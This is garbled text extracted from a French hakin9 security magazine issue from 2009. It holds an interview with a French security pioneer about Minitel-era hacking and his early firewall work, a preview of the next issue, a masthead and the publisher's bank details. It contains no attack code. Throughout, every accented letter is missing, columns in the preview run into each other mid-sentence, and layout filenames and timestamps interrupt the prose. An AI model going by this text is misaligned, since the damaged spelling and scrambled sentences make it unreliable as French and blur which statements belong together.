Nom banque : Socit Gnrale Chasse/Rhne banque guichet numro de compte cl Rib 30003 01353 00028010183 90 IBAN : FR76 30003 01353 00028010183 90 Adresse Swift (Code BIC) : SOGEFRPP
79_prenumerata.indd
79
2009-01-05, 18:28
INTERVIEW
Vous tes la principale figure de la scurit informatique en France. Racontez-nous votre histoire, comment tes-vous tomb dans la scurit, quand avez-vous commenc ? J'ai commenc au milieu des annes 80. Pendant que j'tais l'Universit, je croisais des pseudos-pirates. l'poque le rseau tait Transpac en X25 qui ne proposait que la fonction PAD, le telnet d'aujourd'hui, nous avions au bout principalement PrimeOS, VM/CMS et VMS, et puis avec les universits Unix BSD 4.2 au lieu de VMS sur les Vax de Digital et les premiers Unix commerciaux pour les serveurs minitel. J'ai crois encore plus de pirates quand j'ai mont une socit de serveurs minitel. C'tait l'poque des 3615 (minitel), et nous nous sommes faits pirater, mme si c'est une manire de parler. J'tais toujours l'universit et ma passion pour la scurit est venue de ma curiosit comprendre comment marchaient tous ces mcanismes et quelles erreurs de configuration, de programmation ou de conception permettaient ces intrusions. Les pirates de l'poque, eux, cherchaient gagner les concours qui permettaient de gagner des tls ou des voyages sur des 3615. En piratant le serveur minitel, ils avaient les rsultats des questions des concours, ou mieux ils mettaient directement leur nom en tte du fichier des gagnants. En 1987 a t lanc le groupe scurit de l'Association
80 HAKIN9 2/2009
Franaise des Utilisateurs d'Unix. J'y suis all et ma passion ne s'est pas modre depuis. Aujourd'hui c'est devenu l'OSSIR (Observatoire de la Scurit des Systmes d'Information et des Rseaux) (www.ossir.org) o je suis toujours animateur. 21 ans de scurit Unix ne me rajeunissent pas. J'ai lu aussi dans votre biographie que vous aviez invent le firewall? C'est vrai? HS: Oui et non, le filtrage IP a, lui, t invent en 1989 par la socit Network Systems de Minneapolis, sur un contrat de recherche de la DARPA, une agence amricaine de dfense qui finanait des projets de recherche. Beaucoup plus tard Network Systems a t rachete par StorageTek. Vous voyez encore aujourd'hui dans les sources des routeurs Cisco et Nortel (anciennement Bay Networks, anciennement Wellfleet), que le filtrage IP a t programm en 1991 dans leurs quipements. Il l'ont prsent au public en 1992, en mme temps que moi et mon collgue de l'poque Christophe Wolfhugel. Nous prsentions notre firewall appel garde-barrire (gatekeeper) l'poque avec nos relais telnet et FTP avec authentification des utilisateurs en coupure, et notre DNS priv/public. C'est grce un contrat de recherche avec le CNES (Agence franaise de l'espace) (www.cnes.fr) en 1991 que nous avons pu prsenter cette innovation.
Vous avez fait fortune alors? Pas du tout, nous n'avons dpos aucun brevet, nous avons publi et donn la communaut notre ide. Elle a t reprise dans l'ensemble des firewalls par la suite, DEC SEAL d'o vient aussi TIS FWTK et TIS Gauntlet, desquels viennent aussi Raptor. J'tais dans un groupe qui s'appelait logiciel du domaine public, nous constituions des bandes pour changer du logiciel, je n'avais pas l'esprit de la proprit intellectuelle mais plutt celui du partage. Qu'est devenu votre firewall? Il a trs vite t tendu de nombreux protocoles comme X11, puis a t commercialis par une socit franaise : Solsoft. Comme nous tions consultants, nous n'avions pas vocation dvelopper du logiciel commercial. Une partie du logiciel est devenu un logiciel de configuration de firewalls, appel Net Partitionner, dsormais commercialis par Exaprotect, il marche bien aux USA, et la partie relais a, elle, t publie en logiciel libre par Solsoft sous le nom NSM, puis elle a t reprise et elle est aujourd'hui supporte par la socit INL qui commercialise un firewall libre complet. Aprs cette aventure qu'avez-vous fait? C'tait la grande poque des audits de scurit et des tests d'intrusion. Nous
80_81_Wywiad.indd
80
2009-01-05, 20:00
80_81_Wywiad.indd
81
2009-01-09, 11:41
FEUILLETON
Un regard prcis et pertinent sur la scurit informatique.
SUR LE CD
Suite la lecture de ce dossier vous apprendrez comment assurer la protection des donnes sensibles dans votre entreprise. Larticle vous prsentera les enjeux les plus rcents ainsi que les mthodes de scurisation.
EN BREF
COMME TOUJOURS DANS CHAQUE NUMRO NOUS VOUS PROPOSONS HAKIN9.LIVE AVEC LA DISTRIBUTION BACKTRACK 3.
PRATIQUE
Cette rubrique vous permettra de connatre une mthode dattaque et dappliquer les moyens de dfense a mettre en place.
APPLICATIONS COMMERCIALES EN VERSIONS COMPLTES ET DES Lactualit du monde de la scurit informatique et des systmes dinformation. Les nouvelles failles, PROGRAMMES EN EXCLUSIVIT, POUR LA SCURIT, LA PROTECTION les intrusions web et les nouvelles applications. ET LA STABILIT DE VOTRE SYSTME.
FOCUS
DATA RECOVERY
DES TUTORIELS VIDO PRATIQUES AFIN DE MIEUX COMPRENDRE LES MTHODES OFFENSIVES.
CERTIFICATION CISSP
Cette fois-ci nous vous prsenterons tous les dtails importants sur la certification CISSP Certified Information Systems Security Professional. Nous vous invitons aussi la lecture des astuces pour russir sa certification.
Dans cette rubrique vous allez suivre les risques VOUS SOUHAITEZ COLLABORER lis aux donnes, de la cl USB au serveur, les LLABORATION DARTICLES ? risques de pertes, mais aussi de vol de donnes, les moyens de protections lis ces priphriques. NHSITEZ PAS NOUS CONTACTER!
FR@HAKIN9.ORG
Ce numro sera disponible en Mai La rdaction se rserve le droit de modifier le contenu de la revue.
Le bimensuel hakin9 est publi par Software-Wydawnictwo Sp. z o.o. Prsident de Software-Wydawnictwo Sp. z o.o. : Pawe Marciniak Directrice de la publication : Dominika Baran Rdactrice en chef : Dominika Baran dominika.baran@hakin9.org Fabrication : Marta Kurpiewska marta.kurpiewska@software.com.pl DTP : Marcin Zikowski Graphics & Design Studio e-mail : marcin@gdstudio.pl http://www.gdstudio.pl Couverture : Agnieszka Marchocka Couverture CD : ukasz Pabian Publicit : publicite@software.com.pl Abonnement : abonnement@software.com.pl Diffusion : Katarzyna Winiarz katarzyna.winiarz@software.com.pl Dpt lgal : parution ISSN : 1731-7037 Distribution : MLP Parc dactivits de Chesnes, 55 bd de la Noire BP 59 F - 38291 SAINT-QUENTIN-FALLAVIER CEDEX (c) 2009 Software-Wydawnictwo, tous les droits rservs
Bta-testeurs : Didier Sicchia, Ignace Kangni Kueviako, JF Albertini, Frdric Jean Bassaber, Yves Goux, Clment Facciolo, Grgory Carlet, Rudy Kommer, Anthony Foignant, Vincent le Toux Correction : Clmenet Quinton Les personnes intresses par la coopration sont invites nous contacter : fr@hakin9.org Prparation du CD : Rafal Kwany Imprimerie, photogravure : 101 Studio, Firma Tgi Ekonomiczna 30/36, 93-426 d Imprim en Pologne Adresse de correspondance : Software-Wydawnictwo Sp. z o.o. Bokserska 1, 02-682 Varsovie, Pologne Tl. +48 22 427 32 87, Fax. +48 22 244 24 59 www.hakin9.org Abonnement (France mtropolitaine, DOM/ TOM) : 1 an (soit 6 numros) 35 La rdaction fait tout son possible pour sassurer que les logiciels sont jour, elle dcline toute responsabilit pour leur utilisation.
Elle ne fournit pas de support technique li linstallation ou lutilisation des logiciels enregistrs sur le CD-ROM. Tous les logos et marques dposs sont la proprit de leurs propritaires respectifs. Pour crer les diagrammes on a utilis le programme
Le CD-ROM joint au magazine a t test avec AntiVirenKit de la socit G Data Software Sp. z o.o. La rdaction utilise le systme PAO AVERTISSEMENT Les techniques prsentes dans les articles ne peuvent tre utilises quau sein des rseaux internes. La rdaction du magazine nest pas responsable de lutilisation incorrecte des techniques prsentes. Lutilisation des techniques prsentes peut provoquer la perte des donnes !
83_rekl_Tarusus.indd
2009-01-05, 18:30
84_rekl_Wallix.indd
2009-01-05, 18:31